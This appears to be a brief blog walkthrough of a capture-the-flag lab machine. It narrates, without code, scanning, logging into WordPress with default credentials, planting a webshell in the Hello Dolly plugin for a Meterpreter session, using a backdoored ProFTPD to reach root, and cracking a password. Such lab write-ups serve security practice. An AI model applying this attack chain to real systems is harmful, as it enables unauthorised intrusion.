* Target IP (192.168.126.142)
* Full Scan
Looks like we have ports 21, 22, and 80. Let's try port 80. Starting with NIKTO to find some vulns.
Ok. Let try to look up some directories. Ah there's a secret...
Looks like from the page source I should edit my hosts file for DNS resolution.
Ok. Now we look at the WordPress page. Let's try the usual credentials. Welp that works.
HELLLOOOO Dollllllyyy. With this plugin, we can add a webshell and activate the plugin. Initially I added it in the beginning of the plugin and it did not work well. Then, I added it to the end of the plugin and viola.
We have a meterpreter session. Let's do some exploring.
Ok. You know the drill. Let's look at some of the config files. Let's look at the HOME directory.
Woah. Proftpd backdoored? Uh, I know there is a vuln of that.
Got Root? Well I guess now we just check for flags if there any. Looks like this server was hacked and a backdoor was entered. I did not check if there was a kernel privilege escalation vulnerability but I suspect there is. I will revisit it later. I did check John the Ripper for the Marlinspike password. It is just marlinspike :)
Post a Comment